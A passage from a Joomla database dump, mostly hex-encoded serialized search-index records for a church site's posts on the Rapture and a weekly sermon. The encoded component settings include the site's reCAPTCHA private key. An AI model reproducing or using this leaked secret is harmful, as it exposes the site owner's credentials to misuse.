746f6e223b733a313a2230223b733a31323a22676f6f676c65536561726368223b733a313a2230223b733a32313a22676f6f676c65536561726368436f6e7461696e6572223b733a31313a226b32436f6e7461696e6572223b733a31333a224b325573657250726f66696c65223b733a313a2230223b733a31313a224b325573657247726f7570223b733a313a2231223b733a383a227265646972656374223b733a333a22313038223b733a31313a2261646d696e536561726368223b733a363a2273696d706c65223b733a31323a22636f6f6b6965446f6d61696e223b733a303a22223b733a31363a2267617468657253746174697374696373223b733a313a2231223b733a31333a2274616767696e6753797374656d223b733a313a2231223b733a383a226c6f636b54616773223b733a313a2230223b733a31333a2273686f7754616746696c746572223b733a313a2230223b733a393a226b325461674e6f726d223b733a313a2230223b733a31333a226b325461674e6f726d43617365223b733a353a226c6f776572223b733a33313a226b325461674e6f726d4164646974696f6e616c5265706c6163656d656e7473223b733a303a22223b733a32303a227265636170746368615f7075626c69635f6b6579223b733a34303a22364c667869686b5541414141414d6354446653334b74436877475658796a5a69634a36665755514d223b733a32313a227265636170746368615f707269766174655f6b6579223b733a37323a22364c667869686b554141414141476a736f4f3955375f61324c693558364a5250484a6b73556d4555205374657020313a20636c69656e742d7369646520696e746567726174696f6e223b733a31353a227265636170746368615f7468656d65223b733a353a22636c65616e223b733a31313a227265636170746368615632223b733a313a2231223b733a32333a227265636170746368614f6e526567697374726174696f6e223b733a313a2231223b733a31333a22616b69736d65744170694b6579223b733a303a22223b733a31333a2273746f70466f72756d5370616d223b733a313a2230223b733a31393a2273746f70466f72756d5370616d4170694b6579223b733a303a22223b733a31383a2270726f66696c6550616765446973706c6179223b733a313a2230223b733a32313a2273686f774974656d73436f756e74657241646d696e223b733a313a2231223b733a31373a2273686f774368696c644361744974656d73223b733a313a2231223b733a32323a2264697361626c65436f6d706163744f72646572696e67223b733a313a2230223b733a31333a226d657461446573634c696d6974223b733a333a22313530223b733a32323a22656e666f7263655345465265706c6163656d656e7473223b733a313a2230223b733a31353a225345465265706c6163656d656e7473223b733a323736383a22c3807c412c20c3817c412c20c3827c412c20c3837c412c20c3847c412c20c3857c412c20c3a07c612c20c3a17c612c20c3a27c612c20c3a37c612c20c3a47c612c20c3a57c612c20c4807c412c20c4817c612c20c4827c412c20c4837c612c20c4847c412c20c4857c612c20c3877c432c20c3a77c632c20c4867c432c20c4877c632c20c4887c432c20c4897c632c20c48a7c432c20c48b7c632c20c48c7c432c20c48d7c632c20c3907c442c20c3b07c642c20c48e7c442c20c48f7c642c20c4907c442c20c4917c642c20c3887c452c20c3897c452c20c38a7c452c20c38b7c452c20c3a87c652c20c3a97c652c20c3aa7c652c20c3ab7c652c20c4927c452c20c4937c652c20c4947c452c20c4957c652c20c4967c452c20c4977c652c20c4987c452c20c4997c652c20c49a7c452c20c49b7c652c20c49c7c472c20c49d7c672c20c49e7c472c20c49f7c672c20c4a07c472c20c4a17c672c20c4a27c472c20c4a37c672c20c4a47c482c20c4a57c682c20c4a67c482c20c4a77c682c20c38c7c492c20c38d7c492c20c38e7c492c20c38f7c492c20c3ac7c692c20c3ad7c692c20c3ae7c692c20c3af7c692c20c4a87c492c20c4a97c692c20c4aa7c492c20c4ab7c692c20c4ac7c492c20c4ad7c692c20c4ae7c492c20c4af7c692c20c4b07c492c20c4b17c692c20c4b47c4a2c20c4b57c6a2c20c4b67c4b2c20c4b77c6b2c20c4b87c6b2c20c4b97c4c2c20c4ba7c6c2c20c4bb7c4c2c20c4bc7c6c2c20c4bd7c4c2c20c4be7c6c2c20c4bf7c4c2c20c5807c6c2c20c5817c4c2c20c5827c6c2c20c3917c4e2c20c3b17c6e2c20c5837c4e2c20c5847c6e2c20c5857c4e2c20c5867c6e2c20c5877c4e2c20c5887c6e2c20c5897c6e2c20c58a7c4e2c20c58b7c6e2c20c3927c4f2c20c3937c4f2c20c3947c4f2c20c3957c4f2c20c3967c4f2c20c3987c4f2c20c3b27c6f2c20c3b37c6f2c20c3b47c6f2c20c3b57c6f2c20c3b67c6f2c20c3b87c6f2c20c58c7c4f2c20c58d7c6f2c20c58e7c4f2c20c58f7c6f2c20c5907c4f2c20c5917c6f2c20c5947c522c20c5957c722c20c5967c522c20c5977c722c20c5987c522c20c5997c722c20c59a7c532c20c59b7c732c20c59c7c532c20c59d7c732c20c59e7c532c20c59f7c732c20c5a07c532c20c5a17c732c20c5bf7c732c20c5a27c542c20c5a37c742c20c5a47c542c20c5a57c742c20c5a67c542c20c5a77c742c20c3997c552c20c39a7c552c20c39b7c552c20c39c7c552c20c3b97c752c20c3ba7c752c20c3bb7c752c20c3bc7c752c20c5a87c552c20c5a97c752c20c5aa7c552c20c5ab7c752c20c5ac7c552c20c5ad7c752c20c5ae7c552c20c5af7c752c20c5b07c552c20c5b17c752c20c5b27c552c20c5b37c752c20c5b47c572c20c5b57c772c20c39d7c592c20c3bd7c792c20c3bf7c792c20c5b67c592c20c5b77c792c20c5b87c592c20c5b97c5a2c20c5ba7c7a2c20c5bb7c5a2c20c5bc7c7a2c20c5bd7c5a2c20c5be7c7a2c20ceb17c612c20ceb27c622c20ceb37c672c20ceb47c642c20ceb57c652c20ceb67c7a2c20ceb77c682c20ceb87c74682c20ceb97c692c20ceba7c6b2c20cebb7c6c2c20cebc7c6d2c20cebd7c6e2c20cebe7c782c20cebf7c6f2c20cf807c702c20cf817c722c20cf837c732c20cf847c742c20cf857c792c20cf867c662c20cf877c63682c20cf887c70732c20cf897c772c20ce917c412c20ce927c422c20ce937c472c20ce947c442c20ce957c452c20ce967c5a2c20ce977c482c20ce987c54682c20ce997c492c20ce9a7c4b2c20ce9b7c4c2c20ce9c7c4d2c20ce9e7c582c20ce9f7c4f2c20cea07c502c20cea17c522c20cea37c532c20cea47c542c20cea57c592c20cea67c462c20cea77c43682c20cea87c50732c20cea97c572c20ceac7c612c20cead7c652c20ceae7c682c20ceaf7c692c20cf8c7c6f2c20cf8d7c792c20cf8e7c772c20ce867c412c20ce887c452c20ce897c482c20ce8a7c492c20ce8c7c4f2c20ce8e7c592c20ce8f7c572c20cf8a7c692c20ce907c692c20cf8b7c792c20cf827c732c20d0907c412c20d3907c412c20d3927c412c20d3987c452c20d39a7c452c20d3947c452c20d0917c422c20d0927c562c20d0937c472c20d2907c472c20d0837c472c20d2927c472c20d3b67c472c20797c592c20d0947c442c20d0957c452c20d0807c452c20d0817c594f2c20d3967c452c20d2bc7c452c20d2be7c452c20d0847c59452c20d0967c5a482c20d3817c445a482c20d2967c5a482c20d39c7c445a482c20d0977c5a2c20d2987c5a2c20d39e7c445a2c20d3a07c445a2c20d0857c445a2c20d0987c492c20d08d7c492c20d3a47c492c20d3a27c492c20d0867c492c20d0877c4a492c20d3807c492c20d0997c592c20d28a7c592c20d0887c4a2c20d09a7c4b2c20d29a7c512c20d29e7c512c20d2a07c4b2c20d3837c512c20d29c7c4b2c20d09b7c4c2c20d3857c4c2c20d0897c4c2c20d09c7c4d2c20d38d7c4d2c20d09d7c4e2c20d3897c4e2c20d2a27c4e2c20d3877c4e2c20d2a47c4e2c20d08a7c4e2c20d09e7c4f2c20d3a67c4f2c20d3a87c4f2c20d3aa7c4f2c20d2a87c4f2c20d09f7c502c20d2a67c50462c20d0a07c502c20d28e7c502c20d0a17c532c20d2aa7c532c20d0a27c542c20d2ac7c54482c20d08b7c542c20d08c7c4b2c20d0a37c552c20d08e7c552c20d3b27c552c20d3b07c552c20d3ae7c552c20d2ae7c552c20d2b07c552c20d0a47c462c20d0a57c482c20d2b27c482c20d2ba7c482c20d0a67c54532c20d2b47c54532c20d0a77c43482c20d3b47c43482c20d2b67c43482c20d38b7c43482c20d2b87c43482c20d08f7c445a2c20d0a87c53482c20d0a97c5348542c20d0aa7c412c20d0ab7c592c20d3b87c592c20d0ac7c592c20d28c7c592c20d0ad7c452c20d3ac7c452c20d0ae7c59552c20d0af7c59412c20d0b07c612c20d3917c612c20d3937c612c20d3997c652c20d39b7c652c20d3957c652c20d0b17c622c20d0b27c762c20d0b37c672c20d2917c672c20d1937c672c20d2937c672c20d3b77c672c20797c792c20d0b47c642c20d0b57c652c20d1907c652c20d1917c796f2c20d3977c652c20d2bd7c652c20d2bf7c652c20d1947c79652c20d0b67c7a682c20d3827c647a682c20d2977c7a682c20d39d7c647a682c20d0b77c7a2c20d2997c7a2c20d39f7c647a2c20d3a17c647a2c20d1957c647a2c20d0b87c692c20d19d7c692c20d3a57c692c20d3a37c692c20d1967c692c20d1977c6a692c20d3807c692c20d0b97c792c20d28b7c792c20d1987c6a2c20d0ba7c6b2c20d29b7c712c20d29f7c712c20d2a17c6b2c20d3847c712c20d29d7c6b2c20d0bb7c6c2c20d3867c6c2c20d1997c6c2c20d0bc7c6d2c20d38e7c6d2c20d0bd7c6e2c20d38a7c6e2c20d2a37c6e2c20d3887c6e2c20d2a57c6e2c20d19a7c6e2c20d0be7c6f2c20d3a77c6f2c20d3a97c6f2c20d3ab7c6f2c20d2a97c6f2c20d0bf7c702c20d2a77c70662c20d1807c702c20d28f7c702c20d1817c732c20d2ab7c732c20d1827c742c20d2ad7c74682c20d19b7c742c20d19c7c6b2c20d1837c752c20d19e7c752c20d3b37c752c20d3b17c752c20d3af7c752c20d2af7c752c20d2b17c752c20d1847c662c20d1857c682c20d2b37c682c20d2bb7c682c20d1867c74732c20d2b57c74732c20d1877c63682c20d3b57c63682c20d2b77c63682c20d38c7c63682c20d2b97c63682c20d19f7c647a2c20d1887c73682c20d1897c7368742c20d18a7c612c20d18b7c792c20d3b97c792c20d18c7c792c20d28d7c792c20d18d7c652c20d3ad7c652c20d18e7c79752c20d18f7c7961223b733a353a226b32536566223b733a313a2230223b733a31333a226b325365664c6162656c436174223b733a373a22636f6e74656e74223b733a31333a226b325365664c6162656c546167223b733a333a22746167223b733a31343a226b325365664c6162656c55736572223b733a363a22617574686f72223b733a31363a226b325365664c6162656c536561726368223b733a363a22736561726368223b733a31343a226b325365664c6162656c44617465223b733a343a2264617465223b733a31343a226b325365664c6162656c4974656d223b733a313a2230223b733a32363a226b325365664c6162656c4974656d437573746f6d507265666978223b733a303a22223b733a31373a226b32536566496e736572744974656d4964223b733a313a2231223b733a32343a226b325365664974656d49645469746c65416c696173536570223b733a343a2264617368223b733a32323a226b325365665573654974656d5469746c65416c696173223b733a313a2231223b733a31363a226b32536566496e736572744361744964223b733a313a2231223b733a32333a226b3253656643617449645469746c65416c696173536570223b733a343a2264617368223b733a32313a226b325365665573654361745469746c65416c696173223b733a313a2231223b7d733a31343a22002a00696e697469616c697a6564223b623a313b733a393a22736570617261746f72223b733a313a222e223b7d733a373a226d6574616b6579223b733a303a22223b733a383a226d65746164657363223b733a303a22223b733a383a226d65746164617461223b4f3a32343a224a6f6f6d6c615c52656769737472795c5265676973747279223a333a7b733a373a22002a0064617461223b4f3a383a22737464436c617373223a323a7b733a363a22726f626f7473223b733a303a22223b733a363a22617574686f72223b733a303a22223b7d733a31343a22002a00696e697469616c697a6564223b623a313b733a393a22736570617261746f72223b733a313a222e223b7d733a383a226f72646572696e67223b733a313a2236223b733a353a227472617368223b733a313a2230223b733a393a226361745f7472617368223b733a313a2230223b733a383a2263617465676f7279223b733a353a224661697468223b733a393a226361745f7374617465223b733a313a2231223b733a31303a226361745f616363657373223b733a313a2231223b733a31393a2265787472615f6669656c64735f736561726368223b733a303a22223b733a31323a2265787472615f6669656c6473223b733a323a225b5d223b733a343a22736c7567223b733a31303a2231353a72617074757265223b733a373a22636174736c7567223b733a373a22323a6661697468223b733a363a22617574686f72223b733a393a224c6966656f61736973223b733a363a226c61796f7574223b733a343a226974656d223b733a343a2270617468223b733a32383a22636f6d706f6e656e742f6b322f6974656d2f31352d72617074757265223b733a31303a226d657461617574686f72223b4e3b7d733a31353a22002a00696e737472756374696f6e73223b613a353a7b693a313b613a333a7b693a303b733a353a227469746c65223b693a313b733a383a227375627469746c65223b693a323b733a323a226964223b7d693a323b613a323a7b693a303b733a373a2273756d6d617279223b693a313b733a343a22626f6479223b7d693a333b613a393a7b693a303b733a343a226d657461223b693a313b733a31303a226c6973745f7072696365223b693a323b733a31303a2273616c655f7072696365223b693a333b733a373a226d6574616b6579223b693a343b733a383a226d65746164657363223b693a353b733a31303a226d657461617574686f72223b693a363b733a363a22617574686f72223b693a373b733a31363a22637265617465645f62795f616c696173223b693a383b733a31393a2265787472615f6669656c64735f736561726368223b7d693a343b613a323a7b693a303b733a343a2270617468223b693a313b733a353a22616c696173223b7d693a353b613a313a7b693a303b733a383a22636f6d6d656e7473223b7d7d733a31313a22002a007461786f6e6f6d79223b613a353a7b733a343a2254797065223b613a313a7b733a373a224b32204974656d223b4f3a373a224a4f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a373a224b32204974656d223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d733a363a22417574686f72223b613a313a7b733a393a224c6966656f61736973223b4f3a373a224a4f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a393a224c6966656f61736973223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d733a31313a224b322043617465676f7279223b613a313a7b733a353a224661697468223b4f3a373a224a4f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a353a224661697468223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d733a383a224c616e6775616765223b613a313a7b733a313a222a223b4f3a373a224a4f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a313a222a223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d733a31323a224578747261206669656c6473223b613a313a7b733a323a225b5d223b4f3a373a224a4f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a323a225b5d223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d7d733a333a2275726c223b733a33393a22696e6465782e7068703f6f7074696f6e3d636f6d5f6b3226766965773d6974656d2669643d3135223b733a353a22726f757465223b733a34373a22696e6465782e7068703f6f7074696f6e3d636f6d5f6b3226766965773d6974656d2669643d31353a72617074757265223b733a353a227469746c65223b733a32393a2241726520796f7520707265706172656420666f7220526170747572653f223b733a31313a226465736372697074696f6e223b733a3633303a2220546578743a203154686573343a31342d31383b2031204a6f686e333a322c204d6174742e32343a332c2032372d35312c2032353a33312d34363b204a7564652031343b205265762e393a31312d32313b205a6563682031343a312d3520526170747572652069732061206d696c6974617279207465726d206d65616e696e6720e2809c6120717569636b2074616b652061776179222e2048656e63652c20746865204269626c65207361797320696e2031205468657373616c6f6e69616e7320343a31372e20225468656e2077652077686963682061726520616c69766520616e642072656d61696e207368616c6c2062652063617567687420757020746f6765746865722077697468207468656d20696e2074686520636c6f7564732c20746f206d65657420746865204c6f726420696e20746865206169723a20616e6420736f207368616c6c2077652065766572206265207769746820746865204c6f7264222e205468652076657279206e657874206576656e74206f6e20476f64277320656e642074696d652063616c656e646172206973207468652072617074757265206f6620746865206368757263682e20546869732072656665727320746f20746865206361746368696e67207570206f6620616c6c207468652062656c69657665727320696e2043687269737420666f72206120676c6f72696f7573206d656574696e6720776974682043687269737420696e20746865206169722e20416e64206f6e65206e6f7461626c65207468696e672061626f7574206974206973207468617420697420697320696d6d696e656e7420616e6420636f756c642074616b6520706c61636520616e79206d6f6d656e742e20223b733a393a227075626c6973686564223b4e3b733a353a227374617465223b693a313b733a363a22616363657373223b733a313a2231223b733a383a226c616e6775616765223b733a313a222a223b733a31383a227075626c6973685f73746172745f64617465223b733a31393a22323031372d30312d31352030363a33353a3432223b733a31363a227075626c6973685f656e645f64617465223b733a31393a22303030302d30302d30302030303a30303a3030223b733a31303a2273746172745f64617465223b733a31393a22323031372d30312d31352030363a33353a3432223b733a383a22656e645f64617465223b733a31393a22303030302d30302d30302030303a30303a3030223b733a31303a226c6973745f7072696365223b4e3b733a31303a2273616c655f7072696365223b4e3b733a373a22747970655f6964223b693a323b733a31353a2264656661756c744c616e6775616765223b733a353a22656e2d4742223b7d);
INSERT INTO `y57u5_finder_links` (`link_id`, `url`, `route`, `title`, `description`, `indexdate`, `md5sum`, `published`, `state`, `access`, `language`, `publish_start_date`, `publish_end_date`, `start_date`, `end_date`, `list_price`, `sale_price`, `type_id`, `object`) VALUES
(237, 'index.php?option=com_k2&view=item&id=16', 'index.php?option=com_k2&view=item&id=16:father-s', 'Father\'s Heart (15/01/2017)', ' Dearly beloved, Take note of the following things that you must take along as you go into 2017: 1. The Sword of the Spirit: Load yourself with words from God as you are going into the year. Whatever your work is―a doctor, a banker, a business man―load yourself with words from God. ', '2017-06-25 14:18:22', '49fe8edf6480d2ff23310e519b165cdc', 1, 1, 1, '*', '2017-01-15 09:35:33', '0000-00-00 00:00:00', '2017-01-15 09:35:33', '0000-00-00 00:00:00', 0, 0, 2, 0x4f3a31393a2246696e646572496e6465786572526573756c74223a31393a7b733a31313a22002a00656c656d656e7473223b613a32373a7b733a323a226964223b733a323a223136223b733a353a22616c696173223b733a383a226661746865722d73223b733a373a2273756d6d617279223b733a3331303a223c703e446561726c792062656c6f7665642c3c2f703e0d0a3c703e54616b65206e6f7465206f662074686520666f6c6c6f77696e67207468696e6773207468617420796f75206d7573742074616b6520616c6f6e6720617320796f7520676f20696e746f20323031373a3c2f703e0d0a3c703e312e205468652053776f7264206f6620746865205370697269743a204c6f616420796f757273656c66207769746820776f7264732066726f6d20476f6420617320796f752061726520676f696e6720696e746f2074686520796561722e20576861746576657220796f757220776f726b206973e280956120646f63746f722c20612062616e6b65722c206120627573696e657373206d616ee280956c6f616420796f757273656c66207769746820776f7264732066726f6d20476f642e3c2f703e0d0a223b733a343a22626f6479223b733a323134383a220d0a3c703e322e2054616b65206120436f76656e616e74204d696e647365743a20476f64206973206120636f76656e616e74206b656570696e6720476f643b2048652072656d656d6265727320636f76656e616e742e20556e6465727374616e6420796f7520617265206e6f7420616e206f7264696e6172792068756d616e206265696e672c20796f7520617265206120636f76656e616e74206368696c64206f6620476f642e205468657265206973206120636f76656e616e74206265747765656e20796f7520616e6420476f6420416c6d6967687479207365616c656420696e2074686520626c6f6f64206f66204a657375732e20417320796f7520776f726b206f6e207468697320706c616e657420796f752068617665206120636f76656e616e74207769746820476f642e3c2f703e0d0a3c703e332e20c2a053757265204d657263696573206f6620476f643a20596f75206d75737420756e6465727374616e642074686174207468652073757265206d657263696573206f6620476f642074686174206865206761766520746f20446176696420697320776861742068652063616c6c7320757320746f20656e6a6f79207468697320796561722e3c2f703e0d0a3c703e342e2054686520426c657373696e673a20596f75206d75737420636f6d6520756e6465722074686520626c657373696e6720616e64207374617920756e6465722074686520626c657373696e672e2057652061726520626c6573736564206265796f6e64207468652063757273652e2057652061726520626c6573736564206265796f6e642074686520726563657373696f6e2c2077652061726520626c6573736564206265796f6e64207468652070726f626c656d2e20546f20626520626c65737365642073696d706c79206d65616e7320746865726520697320736f6d657468696e67206f6e20796f7572206c6966652074686174206d616b657320796f7520746f2068617665206120706f736974697665206f7574636f6d65207768656e20796f752070757420666f727468206566666f727420696e206c6966652e204974e280997320612073757065726e61747572616c20696e666c75656e63652e2054686520626c657373696e6720697320612073757065726e61747572616c20666f7263652c20736f6d6574696d65732069742063616e2062652072656c656173656420696e20776f7264732c206275742077686574686572206974e28099732072656c656173656420696e20776f726473206f722070726f766f6b656420627920796f757220616374696f6e2c206974e280997320736f6d657468696e67207468617420777261707320697473656c662061726f756e6420796f7520616e64206368616e67657320796f75722061746d6f7370686572652e2054686520626c657373696e6720616666656374732070656f706c65e280997320726573706f6e736520746f776172647320796f7520616e642063617573657320697420746f206265206661766f757261626c6520746f776172647320796f7572206f7574636f6d652e3c2f703e0d0a3c703e5768656e2061206d616e206973206375727365642c206576656e206174207468652062657374206f6620686973206566666f72742c20686973206f7574636f6d65206973206c6573736572207468616e20776861742069732072657175697265642e3c2f703e0d0a3c703e5768656e20796f752061726520626c657373656420796f752063616e6e6f74206265206375727365642120536f2c20646f6ee2809974206265206166726169642e20546865206f6e6c7920706572736f6e20746861742063616e20637572736520796f7520616e642069742077696c6c207374617920697320476f6420416c6d696768747920616e6420476f642077696c6c206e6f7420616c6c6f7720616e79626f647920746f20637572736520796f752e204576657279206f74686572206167656e7420746861742063616e20737065616b20776f726473207468617420616666656374206d656e20686176652074616b656e20746865697220736f75726365206c6573736572207468616e20476f642c207468657265666f72652069742063616e6e6f7420737461792e3c2f703e0d0a3c703e42616c61616d20747269656420697420616761696e73742049737261656c20627574206865206661696c656420626563617573652074686579207765726520612070656f706c6520626c6573736564206f6620746865204c6f72642e2049662074686520656e656d79207069636b73206f6e20796f752c20686520686173207069636b6564207468652077726f6e672063616e64696461746520746f2066696768742c20666f72206974e2809973207772697474656e206f76657220796f7572206c6966652c20e2809c737572656c79207468657265206973206e6f20656e6368616e746d656e7420616761696e737420796f752c206e65697468657220697320746865726520616e7920646976696e6174696f6e20616761696e737420796f752ee2809d20596f752061726520612063617272696572206f662074686520626c657373696e672ec2a03c2f703e0d0a3c703e416e6420796f75206861766520746f20736574746c65207468617420696e20796f7572206c69666520617320796f75207374657020696e746f20323031372c20676f696e672066726f6d20746f6461792e20546865726520617265206f6e6c792074776f2077617973207468617420796f752061726520676f696e672c20666f727761726420616e64207570776172642ec2a03c2f703e0d0a3c703e54696c6c206e657874207765656b2c20676f20616e642077696e2077697468204a657375732e3c2f703e0d0a3c703e476f64e28099732073657276616e742c3c2f703e0d0a3c703e5265762e204f6c75736f6c61204172656f67756e3c2f703e223b733a353a226361746964223b733a313a2232223b733a31303a22637265617465645f6279223b733a333a22313939223b733a31363a22637265617465645f62795f616c696173223b733a303a22223b733a383a226d6f646966696564223b733a31393a22323031372d30312d32322031303a31393a3135223b733a31313a226d6f6469666965645f6279223b733a333a22313936223b733a363a22706172616d73223b4f3a32343a224a6f6f6d6c615c52656769737472795c5265676973747279223a333a7b733a373a22002a0064617461223b4f3a383a22737464436c617373223a3135323a7b733a31303a22656e61626c655f637373223b733a313a2230223b733a31343a226a517565727948616e646c696e67223b733a313a2230223b733a32313a226261636b656e644a517565727948616e646c696e67223b733a353a226c6f63616c223b733a383a22757365724e616d65223b733a313a2230223b733a393a2275736572496d616765223b733a313a2230223b733a31353a22757365724465736372697074696f6e223b733a313a2230223b733a373a227573657255524c223b733a313a2231223b733a393a2275736572456d61696c223b733a313a2230223b733a31323a2275736572466565644c696e6b223b733a313a2230223b733a31323a22757365724665656449636f6e223b733a313a2231223b733a31333a22757365724974656d436f756e74223b733a323a223130223b733a31333a22757365724974656d5469746c65223b733a313a2231223b733a31393a22757365724974656d5469746c654c696e6b6564223b733a313a2231223b733a31393a22757365724974656d4461746543726561746564223b733a313a2231223b733a31333a22757365724974656d496d616765223b733a313a2231223b733a31373a22757365724974656d496e74726f54657874223b733a313a2231223b733a31363a22757365724974656d43617465676f7279223b733a313a2230223b733a31323a22757365724974656d54616773223b733a313a2231223b733a32323a22757365724974656d436f6d6d656e7473416e63686f72223b733a313a2231223b733a31363a22757365724974656d526561644d6f7265223b733a313a2231223b733a31373a22757365724974656d4b32506c7567696e73223b733a313a2231223b733a31323a227461674974656d436f756e74223b733a323a223130223b733a31323a227461674974656d5469746c65223b733a313a2231223b733a31383a227461674974656d5469746c654c696e6b6564223b733a313a2231223b733a31383a227461674974656d4461746543726561746564223b733a313a2231223b733a31323a227461674974656d496d616765223b733a313a2231223b733a31363a227461674974656d496e74726f54657874223b733a313a2231223b733a31353a227461674974656d43617465676f7279223b733a313a2231223b733a31353a227461674974656d526561644d6f7265223b733a313a2231223b733a31383a227461674974656d45787472614669656c6473223b733a313a2230223b733a31313a227461674f72646572696e67223b733a353a22616c706861223b733a31313a22746167466565644c696e6b223b733a313a2231223b733a31313a227461674665656449636f6e223b733a313a2231223b733a31363a2267656e657269634974656d436f756e74223b733a323a223130223b733a31363a2267656e657269634974656d5469746c65223b733a313a2231223b733a32323a2267656e657269634974656d5469746c654c696e6b6564223b733a313a2231223b733a32323a2267656e657269634974656d4461746543726561746564223b733a313a2231223b733a31363a2267656e657269634974656d496d616765223b733a313a2231223b733a32303a2267656e657269634974656d496e74726f54657874223b733a313a2231223b733a31393a2267656e657269634974656d43617465676f7279223b733a313a2231223b733a31393a2267656e657269634974656d526561644d6f7265223b733a313a2231223b733a32323a2267656e657269634974656d45787472614669656c6473223b733a313a2230223b733a31353a2267656e65726963466565644c696e6b223b733a313a2231223b733a31353a2267656e657269634665656449636f6e223b733a313a2231223b733a393a22666565644c696d6974223b733a323a223130223b733a31333a22666565644974656d496d616765223b733a313a2230223b733a31313a2266656564496d6753697a65223b733a313a2253223b733a31373a22666565644974656d496e74726f54657874223b733a313a2231223b733a31373a226665656454657874576f72644c696d6974223b733a303a22223b733a31363a22666565644974656d46756c6c54657874223b733a313a2231223b733a31323a22666565644974656d54616773223b733a313a2230223b733a31333a22666565644974656d566964656f223b733a313a2230223b733a31353a22666565644974656d47616c6c657279223b733a313a2230223b733a31393a22666565644974656d4174746163686d656e7473223b733a313a2230223b733a31343a2266656564426f677573456d61696c223b733a303a22223b733a31363a22696e74726f54657874436c65616e7570223b733a313a2230223b733a32373a22696e74726f54657874436c65616e75704578636c75646554616773223b733a303a22223b733a32333a22696e74726f54657874436c65616e757054616741747472223b733a303a22223b733a31353a2266756c6c54657874436c65616e7570223b733a313a2230223b733a32363a2266756c6c54657874436c65616e75704578636c75646554616773223b733a303a22223b733a32323a2266756c6c54657874436c65616e757054616741747472223b733a303a22223b733a31323a2278737346696c746572696e67223b733a313a2230223b733a31343a226c696e6b506f7075705769647468223b733a333a22393030223b733a31353a226c696e6b506f707570486569676874223b733a333a22363030223b733a31333a22696d616765735175616c697479223b733a333a22313030223b733a31313a226974656d496d6167655853223b733a323a223634223b733a31303a226974656d496d61676553223b733a333a22323030223b733a31303a226974656d496d6167654d223b733a333a22383536223b733a31303a226974656d496d6167654c223b733a333a22383536223b733a31313a226974656d496d616765584c223b733a333a22383536223b733a31363a226974656d496d61676547656e65726963223b733a333a22383536223b733a31333a22636174496d6167655769647468223b733a333a22313030223b733a31353a22636174496d61676544656661756c74223b733a313a2230223b733a31343a2275736572496d6167655769647468223b733a323a223634223b733a31363a2275736572496d61676544656661756c74223b733a313a2231223b733a31373a22636f6d6d656e746572496d675769647468223b733a323a223438223b733a31373a226f6e6c696e65496d616765456469746f72223b733a393a2273756d6f7061696e74223b733a31343a22696d61676554696d657374616d70223b733a313a2230223b733a31363a22696d6167654d656d6f72794c696d6974223b733a303a22223b733a31363a22736f6369616c427574746f6e436f6465223b733a303a22223b733a31353a2274776974746572557365726e616d65223b733a303a22223b733a31363a2266616365626f6f6b4d65746174616773223b733a313a2231223b733a31333a2266616365626f6f6b496d616765223b733a363a2258536d616c6c223b733a383a22636f6d6d656e7473223b733a313a2232223b733a31363a22636f6d6d656e74734f72646572696e67223b733a343a2244455343223b733a31333a22636f6d6d656e74734c696d6974223b733a323a223130223b733a32303a22636f6d6d656e7473466f726d506f736974696f6e223b733a353a2262656c6f77223b733a31383a22636f6d6d656e74735075626c697368696e67223b733a313a2231223b733a31373a22636f6d6d656e74735265706f7274696e67223b733a313a2232223b733a32333a22636f6d6d656e74735265706f7274526563697069656e74223b733a303a22223b733a32343a22696e6c696e65436f6d6d656e74734d6f6465726174696f6e223b733a313a2230223b733a383a226772617661746172223b733a313a2231223b733a383a22616e74697370616d223b733a393a22726563617074636861223b733a32323a22726563617074636861466f7252656769737465726564223b733a313a2231223b733a32303a22616b69736d6574466f7252656769737465726564223b733a313a2230223b733a31373a22636f6d6d656e7473466f726d4e6f746573223b733a313a2231223b733a32313a22636f6d6d656e7473466f726d4e6f74657354657874223b733a303a22223b733a31353a2266726f6e74656e6445646974696e67223b733a313a2231223b733a31323a2273686f77496d616765546162223b733a313a2231223b733a31393a2273686f77496d61676547616c6c657279546162223b733a313a2231223b733a31323a2273686f77566964656f546162223b733a313a2231223b733a31383a2273686f7745787472614669656c6473546162223b733a313a2231223b733a31383a2273686f774174746163686d656e7473546162223b733a313a2231223b733a31333a2273686f774b32506c7567696e73223b733a313a2231223b733a32323a2273696465426172446973706c617946726f6e74656e64223b733a313a2230223b733a31323a226d65726765456469746f7273223b733a313a2231223b733a31343a2273696465426172446973706c6179223b733a313a2231223b733a31373a226174746163686d656e7473466f6c646572223b733a303a22223b733a31363a2268696465496d706f7274427574746f6e223b733a313a2230223b733a31323a22676f6f676c65536561726368223b733a313a2230223b733a32313a22676f6f676c65536561726368436f6e7461696e6572223b733a31313a226b32436f6e7461696e6572223b733a31333a224b325573657250726f66696c65223b733a313a2230223b733a31313a224b325573657247726f7570223b733a313a2231223b733a383a227265646972656374223b733a333a22313038223b733a31313a2261646d696e536561726368223b733a363a2273696d706c65223b733a31323a22636f6f6b6965446f6d61696e223b733a303a22223b733a31363a2267617468657253746174697374696373223b733a313a2231223b733a31333a2274616767696e6753797374656d223b733a313a2231223b733a383a226c6f636b54616773223b733a313a2230223b733a31333a2273686f7754616746696c746572223b733a313a2230223b733a393a226b325461674e6f726d223b733a313a2230223b733a31333a226b325461674e6f726d43617365223b733a353a226c6f776572223b733a33313a226b325461674e6f726d4164646974696f6e616c5265706c6163656d656e7473223b733a303a22223b733a32303a227265636170746368615f7075626c69635f6b6579223b733a34303a22364c667869686b5541414141414d6354446653334b74436877475658796a5a69634a36665755514d223b733a32313a227265636170746368615f707269766174655f6b6579223b733a37323a22364c667869686b554141414141476a736f4f3955375f61324c693558364a5250484a6b73556d4555205374657020313a20636c69656e742d7369646520696e746567726174696f6e223b733a31353a227265636170746368615f7468656d65223b733a353a22636c65616e223b733a31313a227265636170746368615632223b733a313a2231223b733a32333a227265636170746368614f6e526567697374726174696f6e223b733a313a2231223b733a31333a22616b69736d65744170694b6579223b733a303a22223b